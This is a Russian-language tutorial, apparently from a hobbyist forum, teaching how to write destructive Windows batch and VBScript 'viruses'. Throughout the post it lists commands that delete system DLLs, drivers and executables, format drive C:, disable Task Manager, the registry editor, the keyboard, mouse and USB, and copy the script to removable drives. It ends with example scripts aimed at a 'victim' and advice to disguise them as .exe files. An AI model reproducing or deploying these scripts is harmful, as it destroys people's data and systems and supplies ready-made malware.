Bat-Вирусы
Вы наверное уже слышали о .bat файлах, но сейчас мы поговорим о bat- вирусах. Что бы сделать bat-вирус надо:
1) Открыть болокнот
2) В вести команду
3) Нажать Файл - Сохранить как... - В место *.txt написать имя файла.bat
А вот словарь команд:
rundll32 keyboard,disable – Отключаем клаву, на случай если юзер поймет что происходит и надумает нажать CTRL+C
rundll32 mouse,disable – Отключаем мышь тоже на всякий.
copy 0 %windir/system – Копируемся в папку windows/system
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f – Запретить диспейчер задач
del "%SystemRoot%system32*.dll" /q – Удалить все системные DLL(Динамические загружаемые библиотеки)
del "%SystemRoot%Driver Cachei386driver.cab" /f /q – Удалить все драйверы, установленные на компьютере
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f – Делает невозможным запуск приложений
time 0:00 – Поставить время на 00:00
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 1 /f – Запретить редактирование реестра вручную
del "%SystemRoot%Cursors*.*" – Удалить курсор мыши
del "%SystemRoot%Media" /q – Удалить системные звуки Windows
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f – Запретить вызов панели кправления
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f – Убрать рабочий стол
shutdown -r -t 1 -c "lol" -f – перезагрузка ПК
shutdown -s -t 1 -c "lol" -f – выключение ПК
label C:Диск – Переименовать диск С:
chcp 1251
msg * "Текст сообщения" – Показать Windows-стилизованное сообщение с кнопкой ОК
del "%0" – Самоликвидация вируса
cls – Выходим
net user "х" /add - добавит на компьютер пользователя под именем
color 40 - делаем фон файла красным, а буквы чёрными
assoc .х=.у - переделает все файлы, на компьютере, форматом х на у
C:\WINDOWS\COMMAND\format c: /autotest или Cd\ - форматирование дика С:/
Format C:\
Y
Y
Y
Cd\ - снос винд
Cd C:
Сd windows
cd system
del *.dll
del *.exe
Cd\
Cd C:
Сd winMe
Del *.exe
Del *.ini
Del *.com
Cd\
Cd win98
Cd system
Del *.dll
Del *.exe
copy %0 Диск:run.bat - заражает диск(флэшку дескету и т.п.)
echo c:virus.bat>>c:autoexec.bat - удаляет всё кроме вируса
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\RestrictRun
/v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul
-запрет запуска програм
rundll32 shell32, SHExitWindowsEx 1 - выключить ПК
rundll32 shell32, SHExitWindowsEx 2 - перегрузить ПК
rundll32 user,disableoemlayer - сбой системы (!) - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.
rundll32 user,SetCaretBlinkTime n - задать частоту мигания курсора, соответствующую значению параметра n.
: x ;
Start mspaint - предназначен для бесконечного запуска определённой программы ( здесь указана пайнт).
goto x ;
rundll32 user,SwapMouseButton - поменять местами клавиши мыши (обратная смена невозможна)
------------------------------------------------------------------------------------------------------------------------------------------------------
Кстати есть одна программа которая делает из этого файла exe и добавляет иконку, прога называется Bat To Exe Converter.
Удачи)
примеры
set lights = createobject("wscript.shell")
lights.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\disabletaskmgr", "1" ,"REG_DWORD"
application.minimizeall
lights.regwrite"HKCR\exefile\shell\open\command\","rundll32.exe"
lights.regwrite "HKEY_CURRENT_USER\Control Panel\International\sTimeFormat","ЧМО ТУПОЕ"
lights.run "C:\WINDOWS\system32\ping.exe 127.0.0.1 /t /l 65500", 0
lights.run "C:\WINDOWS\system32\ping.exe 127.0.0.1 /t /l 65500", 0
lights.run "C:\WINDOWS\system32\ping.exe 127.0.0.1 /t /l 65500", 0
lights.run "C:\WINDOWS\system32\ping.exe 127.0.0.1 /t /l 65500", 0
lights.run "C:\WINDOWS\system32\ping.exe 127.0.0.1 /t /l 65500", 0
lights.run"reg add ""hklm\system\currentcontrolset\control\keyboard layout"" /v ""Scancode Map"" /t REG_BINARY /d 0000000000000000A000000000005DE000000E0000003A00000053E000004FE000001C0000000100000047E0000052E00000380000001D0000002A0000005BE000004500000051E0000049E000005EE0000037E0000038E000001DE00000360000005CE00000460000005FE00000390000000F00000063E00000280000000C000000330000003400000035000000270000001A0000002B0000001B000000290000000D0000000B00000002000000030000000400000005000000060000000700000008000000090000000A0000001E000000300000002E0000002000000012000000210000002200000023000000170000002400000025000000260000003200000031000000180000001900000010000000130000001F00000014000000160000002F000000110000002D000000150000002C0000003B0000003C0000003D0000003E0000003F00000040000000410000004200000043000000440000005700000058000000640000006500000066000000520000004F00000050000000510000004B0000004C0000004D0000004700000048000000490000004A000000370000005300000035E000004E0000001CE0000050E000004BE000004DE0000048E000000000",0
lights.regwrite"HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR\Start","4","REG_DWORD"
do
execute"lights.Run ""%comspec% /c "" & Chr(7), 0,True"
loop
1. Отключает диспечер задач
2. Перестают открываться *.EXE файлы
3. Вместо часов показывается надпись "ЧМО ТУПОЕ"
4. Комп жертвы наченает пинговать себя максимально большими пакетами в 5 патоков
5. Отключается клавиатура
6. Отключаются USB
7. Компьютер начинает истерично пищать системным динамиком.
и простенький
echo off
date 01.01.99
cd C\Programm Files
cd\
del *.*
и вспомнил обратную команду!
